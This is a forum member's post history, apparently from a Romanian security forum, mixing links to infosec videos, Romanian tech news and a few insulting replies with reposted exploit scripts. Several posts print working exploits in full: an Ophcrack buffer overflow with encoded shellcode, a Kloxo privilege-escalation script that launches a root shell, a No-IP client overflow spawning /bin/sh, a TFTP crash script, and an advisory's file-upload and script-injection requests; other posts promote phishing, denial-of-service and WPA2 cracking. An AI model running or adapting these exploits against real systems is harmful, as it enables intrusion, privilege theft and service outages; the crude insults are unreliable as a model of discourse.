Jump to content

Kwelwild

Active Members
  • Posts

    638
  • Joined

  • Last visited

  • Days Won

    1

Everything posted by Kwelwild

  1. Description: In this video Haxor Magee shows us how to dump Android Memory using Lime tool. Why we need to dump the memory suppose our phone is infected with the malware or want to analysis the memory, what is going on in the memory, what kind of services are running etc. That's why we are using a line tool for dumping memory and for analysis you need to use Framework called Volatility or there are lots of other tools available. Lime : - Downloads - lime-forensics - LiME - Linux Memory Extractor - Google Project Hosting LiME (formerly DMD) is a Loadable Kernel Module (LKM), which allows the acquisition of volatile memory from Linux and Linux-based devices, such as those powered by Android. The tool supports acquiring memory either to the file system of the device or over the network. LiME is unique in that it is the first tool that allows full memory captures from Android devices. It also minimizes its interaction between user and kernel space processes during acquisition, which allows it to produce memory captures that are more forensically sound than those of other tools designed for Linux memory acquisition. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Android Forensics: Pulling Android Memory Using Lime
  2. Description: In this video you will learn how to create a Phishing webpage and use Advanced phishing techniques to hack your victim. In this video she is using a PHP Redirect script, winscap and more. She's not providing us a phishing webpage for security reason so you need to create your own but here is a PHP Script :http://www.security-plus.co/redirect.zip WinSCP: WinSCP :: Download Wifi- Pineapple: HakShop — WiFi Pineapple Mark IV Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Advanced Phishing On The Wi-Fi Pineapple Iv
  3. Description: In this video you will learn Analysis on a Shellcode using scdgb.This is a basic overview of scdgb for shellcode analysis. scdgb:- scdbg is a shellcode analysis application built around the libemu emulation library. When run it will display to the user all of the Windows API the shellcode attempts to call. RE Corner Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Scdgb - Shellcode Analysis
  4. Description: In this video you will learn how to write a simple shellcode. This shellcode will create an admin account to the windows machine system and writing this shellcode you need to know Assembly Language. Full Tutorial: Shellcode Tutorial 3: Windows Command Execution Shellcode | Project Shellcode Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Simple Shellcoding: Shellcoding 101
  5. http://www.youtube.com/watch?feature=player_embedded&v=H_zSsgdxKUs Description: In this video you will learn how to write a 'uname -a' Shellcode under Linux/x86. He is creating a exploit code in assembly language so writing this shellcode you need to know Assembly Language. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Lesson 2 - Writing 'uname -a' Shellcode under Linux/x86 . - YouTube Sursa: Writing 'Uname -A' Shellcode Under Linux/X86 .
  6. Yahoo preia serviciul de blogging Tumblr pentru 1,1 miliarde de dolari Yahoo! va prelua Tumblr, serviciu care gazduieste 108 milioane de bloguri, pentru 1,1 miliarde de dolari, directorul general Marissa Mayer incercand sa atraga mai multi utilizatori si contracte de publicitate, relateaza Bloomberg. Tumblr, cu sediul central in New York, va continua sa gazduiasca cele peste 108 milioane de bloguri, iar directorul general fondator al companiei, David Karp, in varsta de 26 de ani, va raspunde in continuare de site, se arata intr-un comunicat al Yahoo!. Mayer mizeaza ca Tumblr va contribui la cresterea atractivitatii Yahoo! pe piata publicitatii online, pe care concureaza cu Google si Facebook. Pretul care va fi platit, de aproximativ o cincime din numerarul de 5,4 miliarde de dolari de care dispune Yahoo!, scoate in evidenta importanta data de Mayer planului de relansare a companiei, considera Zachary Reiss-Davis, analist la Forrester Research. "Este o miscare agresiva. Ei spun, unde este viitorul grup de oameni care vor petrece multe ore pe saptamana pe proprietatile Yahoo!? Este un pariu mare ca acestia vor fi utilizatorii Tumblr", a spus Reiss-Davis intr-un interviu. Tranzactia urmeaza sa fie finalizata in a doua jumatate a lui 2013, se arata in comunicatul Yahoo!. Fondata de Karp in 2007, Tumblr a ajuns la peste 13 miliarde de utilizatori la nivel mondial, in ultima luna. Site-ul ofera un serviciu gratuit pentru publicarea de bloguri pe web si pe aparatele mobile, precum si functii de partajare de fotografii si continut pe retelele sociale. Tranzactia il transforma pe Karp in multimilionar, dupa ce a fondat compania cu banii si experienta dobandita in functia de consultant software pentru site-ul UrbanBaby. Sursa: Yahoo preia serviciul de blogging Tumblr pentru 1,1 miliarde de dolari - www.yoda.ro
  7. Ophcrack 3.5.0 - Local Code Execution BOF # Exploit Title: ophcrack v3.5.0 - Local Code Execution BOF # Date: 21.05.2013 # Exploit Author: xis_one@STM Solutions # Vendor Homepage: http://ophcrack.sourceforge.net/ # Software Link: http://downloads.sourceforge.net/ophcrack/ophcrack-#win32-installer-3.5.0.exe # Version: 3.5.0 # Tested on: Windows XP SP3 Eng (32bits) #!/usr/bin/python #Stack based buffer overflow - direct EIP overwrite in this case (SEH based exploitation is possible as well) #In order to exploit go to: Load -> Remote SAM -> put the content of buffer.txt file generated by this exploit into the "Host name:" field -> "Don't send" once you see the crash. #pwdump6_setup.exe will be run by ophrack.It will nicely crash and execute the payload. #pwdump6_setup itself doesn't look to be exploitable outside of ophrack. #Kudos to Hostess for pointing me to #http://www.mattandreko.com/2013/04/buffer-overflow-in-hexchat-294.html shellcode = ( #windows/exec EXITFUNC=seh CMD=calc R | msfencode -e x86/alpha_mixed bufferregister=esp -t c "\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" "\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b" "\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58" "\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x79\x78\x6c\x49\x57\x70" "\x65\x50\x65\x50\x75\x30\x6e\x69\x7a\x45\x44\x71\x7a\x72\x75" "\x34\x4e\x6b\x46\x32\x30\x30\x4e\x6b\x56\x32\x34\x4c\x4e\x6b" "\x36\x32\x54\x54\x4e\x6b\x73\x42\x71\x38\x36\x6f\x48\x37\x32" "\x6a\x36\x46\x75\x61\x69\x6f\x34\x71\x49\x50\x6e\x4c\x55\x6c" "\x30\x61\x61\x6c\x45\x52\x44\x6c\x57\x50\x6f\x31\x78\x4f\x56" "\x6d\x47\x71\x69\x57\x7a\x42\x6a\x50\x31\x42\x46\x37\x4e\x6b" "\x71\x42\x66\x70\x6e\x6b\x43\x72\x35\x6c\x66\x61\x58\x50\x6e" "\x6b\x37\x30\x54\x38\x6e\x65\x6f\x30\x31\x64\x53\x7a\x56\x61" "\x4e\x30\x66\x30\x6e\x6b\x50\x48\x65\x48\x4e\x6b\x30\x58\x65" "\x70\x46\x61\x7a\x73\x6a\x43\x35\x6c\x43\x79\x6e\x6b\x46\x54" "\x6e\x6b\x75\x51\x7a\x76\x75\x61\x49\x6f\x66\x51\x6b\x70\x4c" "\x6c\x49\x51\x68\x4f\x66\x6d\x77\x71\x48\x47\x44\x78\x6b\x50" "\x62\x55\x7a\x54\x34\x43\x61\x6d\x4a\x58\x67\x4b\x53\x4d\x66" "\x44\x71\x65\x49\x72\x72\x78\x6e\x6b\x73\x68\x44\x64\x53\x31" "\x5a\x73\x43\x56\x6e\x6b\x54\x4c\x30\x4b\x4e\x6b\x73\x68\x35" "\x4c\x56\x61\x4b\x63\x4c\x4b\x66\x64\x6c\x4b\x46\x61\x58\x50" "\x4f\x79\x32\x64\x56\x44\x54\x64\x73\x6b\x63\x6b\x65\x31\x31" "\x49\x72\x7a\x62\x71\x49\x6f\x69\x70\x62\x78\x31\x4f\x30\x5a" "\x6c\x4b\x44\x52\x5a\x4b\x4b\x36\x51\x4d\x53\x5a\x67\x71\x6c" "\x4d\x4b\x35\x78\x39\x75\x50\x35\x50\x45\x50\x42\x70\x30\x68" "\x35\x61\x6e\x6b\x42\x4f\x4d\x57\x79\x6f\x69\x45\x4d\x6b\x6b" "\x4e\x66\x6e\x54\x72\x59\x7a\x43\x58\x59\x36\x4d\x45\x6d\x6d" "\x4f\x6d\x39\x6f\x5a\x75\x75\x6c\x34\x46\x73\x4c\x57\x7a\x6d" "\x50\x4b\x4b\x49\x70\x61\x65\x44\x45\x4f\x4b\x61\x57\x74\x53" "\x32\x52\x52\x4f\x31\x7a\x43\x30\x36\x33\x39\x6f\x49\x45\x50" "\x63\x65\x31\x32\x4c\x63\x53\x43\x30\x41\x41") #!mona jmp -r esp -cp ascii -> 0x6e2a2936 : jmp esp asciiprint,ascii {PAGE_EXECUTE_READ} [QtCore4.dll] jmp="\x36\x29\x2a\x6e" buffer = "A"*497 + jmp + shellcode print(buffer) file = open('exploit.txt','w') file.write(buffer) file.close() Sursa: Ophcrack 3.5.0 - Local Code Execution BOF
  8. Description: In this episode of SecuraTip we focus on OSINT analysis of IP Addresses, URLs, and Hashes using Automater. Automater given a target (-t) or a file (-f) will determine if it is a URL, IP, or hash and will then run the appropriate tool-set against the file giving the user a common output. To download Automater or get more details on it, visit TekDefense - Automater. @TekDefense Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Securatip Episode 2: Automater
  9. Description: In this video Keren talking about Stack buffer overflow on a SurgeMail. She's using a Metasploit Framework for fuzzing. First you need to check if the vulnerability available or not. Using Metasploit fuzzing you will scan the target and check for the vulnerability. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Stack Buffer Overflow - Surgemail
  10. Tu esti normal?! Te cred si eu ca nu mai merge download-ul. Data postului (ca sa vada toti chiorii care vor mai posta in acest topic): 08-11-2008, 01:29 PM
  11. Bun venit tie si celor n'spe milioane de copii numiti vad sunete
  12. Description: RFID Security RFID smartcards are often thought of as being a secure means for access control and personal identification. To make RFID smartcards ‘more secure’, companies implemented technologies such as MIFARE and iCLASS. Yet, still these security features are easily defeated with the right tools. One such tool is the proxmark3, which is capable of reading and simulating almost any type of RFID tag/card. It’s been around for a few years now and is a continuous work-in-progress that allows it to support the latest technologies and newer features. This device makes it capable for anyone to steal your Near Field Communication (NFC) credit cards , or lift your smartcard you use for access control — below we’ll show you how to get the client for proxmark3 on your android device. Going further with your proxmark3 The PM3 has a limited stand-alone mode if you connect it to an external USB power source, otherwise one would typically use the device while connected to a laptop/PC to power it over USB and control it via CLI. Obviously in a penetration test or social engineering scenario, discretion and mobility would be ideal. Therefore, we thought it would be perfect to use the proxmark3 on android for a couple of reasons — First of all, mobility would be greatly improved. Secondly, you can discreetly control and watch the device via the full feature CLI. Also, you open up more useful possibilities like being able to remotely control the device over SSH. Full post: Owning RFID: Proxmark3 on your android Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Owning Rfid: Proxmark3 On Your Android
  13. http://www.youtube.com/watch?feature=player_embedded&v=4V7-GkOP9Lc Description: Live example with demonstration of hacking into windows 7. Exploiting the "Internet Explorer Auto-Pawn" vulnerability. Used "msfconsole" for exploitation. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Hacking Windows 7 using Metasploit Framework (msfconsole) - YouTube Sursa: Hacking Windows 7 Using Metasploit Framework (Msfconsole)
  14. http://www.youtube.com/watch?feature=player_embedded&v=f63uljEh-I8 Description: Video on stopping simple SET attacks by enabling SRP on a windows domain. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Thwarting Client Side Attacks with SRP - YouTube Sursa: Thwarting Client Side Attacks With Srp
  15. Metasploit Forensics: Recovery Files From Ntfs Description: Module to list and recover deleted files from NTFS (Meterpreter session) Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Metasploit Forensics: Recovery Files From Ntfs
  16. Ce-i ma asta?! a?! Ma pis pe voi ma, forumul merge perfect, iar cacatul ala de ddos e activ doar pe ip vostru (adica v-ati facut de ras). Apropo, vad pe acolo niste "proiecte" (ca asa le numiti voi) foarte interesante (surse adunate de la toate colturile de pe net, design-uri copiate si multe alte cacaturi). "Nu ne mai pupati in cur pentru ca veti ramane cu floci pe buze".
  17. Cautarea pe Google se schimba "fundamental". Cel mai nou anunt facut de companie Afirmatia a venit la conferinta anuala a developerilor Google I/O care a avut loc la San Francisco Modul in care vom folosi Google pentru a face cautari pe Internet se va schimba. Compania din spatele motorului de cautare a anuntat, miercuri, ca extinde capabilitatile de cautare vocala dar si alte functii, care spera sa schimbe "fundamental" felul in care cautam informatii. Sfarsitul cautarii pe Internet asa cum o stim (Amit Singhal, Senior Vice President Google) Feature-urile anuntate la conferinta anuala a developerilor Google I/O par mai mult evolutionare decat revolutionare, dar Amit Singhal, Senior Vice President la Google, a declarat ca spera ca o parte din tehnologia prezentata sa duca la "sfarsitul cautarii pe Internet asa cum o stim", scrie WashingtonPost. Cheia pentru asta, mai spune Singhal, sta in noile moduri in care putem folosi cautarea vocala pentru a combina puterea motorului de cautare Google cu tehnologiile avansate de recunoastere audio. Singhal a spus, chiar, ca aceste noi imbunatatiri transforma Google in computerul din Star Trek, care se activa la comenzi vocale si care putea sa raspunda la orice intrebare pusa de echipaj. Singhal a recunoscut ca mereu si-a dorit sa construiasca un calculator precum cel din film. Va schimba felul in care tu si cu mine experimentam aceasta frumoasa calatorie pe care o numim viata (Amit Singhal) Oficialul Google a mai declarat ca motorul de cautare pentru care lucreaza, in viitor, "va raspunde, va conversa si va anticipa", cu alte cuvinte, va procesa mai bine propozitiile spuse de utilizator in limbajul natural, obisnuit. Spre exemplu, daca un utilizator intreaba "Care este cea mai apropiata pizzerie?", acesta va avea nevoie, ulterior, si de raspunsuri la intrebari precum "La ce ora se inchide?" sau "Ce numar de telefon are?". Singhal a mai declarat ca spera ca noile cautari pe Google, in viitor, sa fie capabile sa ii ofere utilizatorului toate informatiile de care are nevoie, ghicindu-i dorintele. Sursa: Cautarea pe Google se schimba fundamental . Cel mai nou anunt facut de companie - www.yoda.ro
  18. Demo: Performing A Dos-Attack On A Webserver Using Xerxes Description: Demo: Performing a DoS-attack on a webserver using Xerxes Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Demo: Performing A Dos-Attack On A Webserver Using Xerxes
  19. Android Gesture Key Decode http://www.youtube.com/watch?feature=player_embedded&v=Ju-yOUDYwkk Description: the device needs to have usb debugging enabled in case usb debugging isn't enabled and you have cwm you can run the same instructions from cwm,root is not required (though it will be so better if the device was rooted) Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: https://www.youtube.com/watch?v=Ju-yOUDYwkk Sursa: Android Gesture Key Decode
  20. Serva 32 TFTP 2.1.0 - Buffer Overflow Denial of service #Serva 32 TFTP Buffer overflow DoS # #05/14/2013 #Sapling #Vendor homepage http://www.vercot.com/ #Software Link: #http://www.vercot.com/~serva/download/Serva_Non-Supporter_32_v2.1.0.zip #Version 2.1.0 Only prior versions are not vulnerable #Tested on Windows 8, Windows 7, Windows XP SP1-3 #CVE to be established today or tomorrow. # #This is the serva 32 Proof Of Concept exploit discovered and written by Sapling. At this #time the exploit is only a denial of service but evidence show it may be controllable. #The difficulty with controlling it at this point was the failure to overwrite the SEH #chains or bypass them. The crash occurs when sending a message longer than 509 bytes long #start of python file import sys import socket new = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) new.connect(('192.168.1.19', 69)) new.send('\x41'*510) #end of python file Sursa: Serva 32 TFTP 2.1.0 - Buffer Overflow Denial of service
  21. E roman frate (stiti la ce ma refer prin 'e roman'), pun pariu ca banii s-au dus deja!
  22. File Lite 3.3 & 3.5 PRO iOS - Multiple Vulnerabilities Title: ====== File Lite 3.3 & 3.5 PRO iOS - Multiple Web Vulnerabilities Date: ===== 2013-05-04 References: =========== http://www.vulnerability-lab.com/get_content.php?id=939 VL-ID: ===== 939 Common Vulnerability Scoring System: ==================================== 5.9 Introduction: ============= You have tons of files you need to get from one device to another, so what do you do? You use File Pro, that’s what you do. App Chronicles! Multipurpose, Easy-to-Use and Robust app for files & documents. Import files, documents & media from PC/Mac, email attachments, dropbox, sugarsync, iCloud & Box.net to File Pro along with amazing transfer features of FTP and Wifi. The only documents manager app which includes total security of files along with PDF scanner, Audio Recorder and editing TXT files. Open all kind of file & documents including RAR and CBR files. (Copy of the Homepage: https://itunes.apple.com/de/app/file-pro-document-viewer-file/id537623975 ) [PRO VERSION] (Copy of the Homepage: https://itunes.apple.com/de/app/file-lite-document-viewer/id540971042 ) [LITE VERSION] Abstract: ========= The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the mobile File Lite 3.3 & 3.5 PRO iOS app (Apple - iPad|iPhone). Report-Timeline: ================ 2013-05-04: Public Disclosure Status: ======== Published Affected Products: ================== Apple AppStore Product: File Lite - Evereader Wi-Fi Sharing iOS 3.3 & 3.5 PRO Exploitation-Technique: ======================= Remote Severity: ========= High Details: ======== 1.1 A local file include and arbitrary file upload vulnerability is detected in the mobile File Lite 3.3 & 3.5 PRO iOS app (Apple - iPad|iPhone). The vulnerability allows remote attackers via POST method to include unauthorized remote files on the affected webserver file system. Remote attackers can also unauthorized implement mobile webshells by using multiple file extensions (*.php.js.gif) when processing to upload via POST request method. The attacker uploads a file with a double extension or multiple extensions and access the file in the secound step by usage of the directory webserver dir listing to compromise the apple iphone or ipad application. Exploitation of the local file include web vulnerability does not require user interaction and also no application user account. Successful exploitation of the web vulnerabilities results in app/service manipulation and ipad or iphone compromise via file include or unauthorized web-server file (webshell) upload attacks. Vulnerable Application(s): [+] File Lite 3.3 & 3.5 PRO - ITunes or AppStore (Apple) Vulnerable Module(s): [+] File Upload Vulnerable Parameter(s): [+] filename Affected Module(s): [+] File Dir Index Listing 1.2 A persistent input validation vulnerability is detected in the mobile Wifi Photo Transfer 2.1 & 1.1 Pro app for the apple ipad & iphone. The bug allows an attacker (remote) to implement/inject malicious script code on the application side (persistent) of the app web service. The vulnerability is located in the index file dir listing module of the webserver (http://localhost:8080/) when processing to display injected and via POST request method manipulated filenames. The persistent script code will be executed out of the main index file dir listing module when the service is processing to list the new malicious injected filename as item. Exploitation of the persistent web vulnerability requires low or medium user interaction without an application user account. Successful exploitation of the vulnerability can lead to persistent session hijacking (customers), account steal via persistent web attacks, persistent phishing or stable (persistent) certificate mail notification context manipulation. Vulnerable Application(s): [+] File Lite 3.3 & 3.5 PRO - ITunes or AppStore (Apple) Vulnerable Module(s): [+] File Upload Vulnerable Parameter(s): [+] Name Affected Module(s): [+] Filename - Index File Dir Name Listing 1.3 A client side cross site scripting web vulnerability is detected in the mobile Wifi Photo Transfer 2.1 & 1.1 Pro app for the apple ipad & iphone. The vulnerability allows remote attackers to form manipulated urls to inject script code on client side application requests. The client side cross site scripting web vulnerability is located in the index section when processing to request the via GET a manipulated filename (value) as response. The vulnerability occurs when a remote attacker is changing the GET file request to own script code. The request will be executed on client side of the victims browser. Exploitation of the vulnerability does not require an application user account but low or medium user interaction. Successful exploitation results in client side cross site requests, unauthorized external redirects, client side phishing, client side session hijacking and client side module context manipulation. Vulnerable Application(s): [+] File Lite 3.3 & 3.5 PRO - ITunes or AppStore (Apple) Vulnerable Module(s): [+] Files - GET Request Vulnerable Parameter(s): [+] filename Proof of Concept: ================= 1.1 the arbitrary file upload vulnerability can be exploited by remote attackers without required application user account or user interaction. For demonstration or reproduce ... PoC: POST REQUEST METHOD - FILE UPLOAD Host=192.168.2.104:8080 User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0 Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language=en-US,en;q=0.5 Accept-Encoding=gzip, deflate DNT=1 Referer=http://192.168.2.104:8080/ Connection=keep-alive Content-Type=multipart/form-data; boundary=---------------------------48201118910051 Content-Length=98447 POSTDATA =-----------------------------48201118910051 Content-Disposition: form-data; name="newfile"; filename="hacki-hack.png.txt.html.php.gif[FILE UPLOAD VULNERABILITY]" Content-Type: image/gif ?PNG ... Review: [{'name':'.Private', 'id':0},{'name':'1234.png.txt.iso.php.gif', 'id':1},{'name':'Recents', 'id':2},{'name':'benjamin.html', 'id':3}] Reference(s): http://localhost:8080/files 1.2 The persistent script code injection web vulnerability can be exploited by remote attackers without application user account and with low user interaction. For demonstration or reproduce ... PoC: File Name - Index Output Listing <a href="http://192.168.2.104:8080/files/%3E%22%3Ciframe%20src=a%3E" class="file"> >"<[PERSISTENT SCRIPT CODE INJECT VULNERABILITY!] src="Welcome%20to%20Evereader%20Wi-Fi%20Sharing%21_files/hack.txt"></a>< /td><td class='del'><form action='/files/%3E%22%3C[PERSISTENT SCRIPT CODE INJECT VULNERABILITY!]%3E' method='post'><input name='_method' value='delete' type='hidden'/><input name="commit" type="submit" value="Delete" class='button' /></td></tr></tbody></table></iframe></a> 1.3 The client side script code injection web vulnerability can be exploited by remote attackers without application user account and with low or medium required user interaction. For demonstration or reproduce ... PoC: GET REQUEST METHOD - File Request --- Request Header --- Host=192.168.2.104:8080 User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0 Accept=application/json, text/javascript, */* Accept-Language=en-US,en;q=0.5 Accept-Encoding=gzip, deflate DNT=1 X-Requested-With=XMLHttpRequest Referer=http://192.168.2.104:8080/ Cookie=USERID=<SCRIPT>document.cookie=true</SCRIPT>; true Connection=keep-alive --- Response Header --- Status=OK - 200 Accept-Ranges=bytes Content-Length=171 Cache-Control=private, max-age=0, must-revalidate Content-Type=text/plain; charset=utf-8 Date=Fr., 26 Apr 2013 17:48:48 GMT URL: http://localhost:8080/files?Fri%20Apr%2026%202013%2019:46:51%20GMT+0200 Solution: ========= 1.1 Parse the POST method request when processing to upload a file with wrong extension and disallow double extensions. Restrict the file access of web files like html, php or java-script. Implement a own exception-handling to prevent again future arbitrary file uploads. 1.2 Restrict the input/output of the del filename and file input parameter. Encode and parse the output of the both vulnerable values to patch the issue. 1.3 Parse the parameter request with the flag details to fix the vulnerability in the GET request. Risk: ===== 1.1 The security risk of the remote arbitrary file upload vulnerability is estimated as high(-) 1.2 The security risk of the persistent input validation web vulnerability is estimated as medium(+). 1.3 The security risk of the client side cross site scripting vulnerability is estimated as low(+). Credits: ======== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com) [www.vulnerability-lab.com] Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. Copyright © 2013 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: research@vulnerability-lab.com Sursa: File Lite 3.3 & 3.5 PRO iOS - Multiple Vulnerabilities
  23. Kloxo 6.1.6 - Local Privilege Escalation #!/bin/sh # Exploit Title: Kloxo Local Privilege Escalation # Google Dork: inurl:kiddies # Date: August 2012 or so # Exploit Author: HTP # Vendor Homepage: http://lxcenter.org/ # Software Link: [download link if available] # Version: 6.1.6 (Latest) # Tested on: CentOS 5 # CVE : None # This exploit requires you to be the Apache user, or another capable of running lxsuexec. LXLABS=`cat /etc/passwd | grep lxlabs | cut -d: -f3` export MUID=$LXLABS export GID=$LXLABS export TARGET=/bin/sh export CHECK_GID=0 export NON_RESIDENT=1 echo "unset HISTFILE HISTSAVE PROMPT_COMMAND TMOUT" >> /tmp/w00trc echo "/usr/sbin/lxrestart '../../../bin/bash --init-file /tmp/w00trc #' " > /tmp/lol lxsuexec /tmp/lol Sursa: Kloxo 6.1.6 - Local Privilege Escalation
  24. No-IP Dynamic Update Client (DUC) 2.1.9 - Local IP Address Stack Overflow #!/usr/bin/env python # Title: No-IP Dynamic Update Client (DUC) 2.1.9 local IPaddress stack overflow # Author: Alberto Ortega @a0rtega # alberto[@]pentbox[.]net # Date: May 11 2013 (vulnerability discovered) # Background: # # No-IP is probably the most used Dynamic DNS provider worldwide, # their Dynamic Update Client (DUC) is present by default in tons of # systems, software repositories and embedded devices. # # Description: # # To be easily portable, the client is written in C, with minimal # dependencies. So far so good, but the problem is, it is plagued of # buffer overflows. # # Vulnerability: # # This exploit covers a stack-based overflow present in -i # parameter, IPaddress variable name in source code. # # It is probably the most basic parameter, as this is the way to say # the client that our IP has changed. # # For the PoC we will use the Linux x86 client version 2.1.9: # https://www.noip.com/client/linux/noip-duc-linux.tar.gz # 3b0f5f2ff8637c73ab337be403252a60 # # http://a0rtega.pentbox.net/partyhard/noip2iexploit.txt # # Solution: # # API: https://www.noip.com/integrate/ # # If you are an embedded systems developer, you should write # your own implementation of the client. # # If you are a repository maintainer, the best solution may be # change the official client for another one. # # Compile the distributed binaries with some mitigations and # include them by default in Makefile would help too. import os binary = "./noip-2.1.9-1/binaries/noip2-i686" shellcode = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"\ "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"\ "\x80\xe8\xdc\xff\xff\xff/bin/sh" nop = "\x90" nop_slide = 296 - len(shellcode) # (gdb) print &IPaddress # $2 = (<data variable, no debug info> *) 0x80573bc eip_addr = "\xbc\x73\x05\x08" print "[*] Executing %s ..." % (binary) os.system("%s -i %s%s%s" % (binary, nop*nop_slide, shellcode, eip_addr)) Sursa: No-IP Dynamic Update Client (DUC) 2.1.9 - Local IP Address Stack Overflow
  25. Description: Wi-Fi hacking : Cracking WPA2 PSK. Video demo by Saravanan from Defcon DCG Kerala InfoSec Meet. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Cracking Wpa2 Psk
×
×
  • Create New...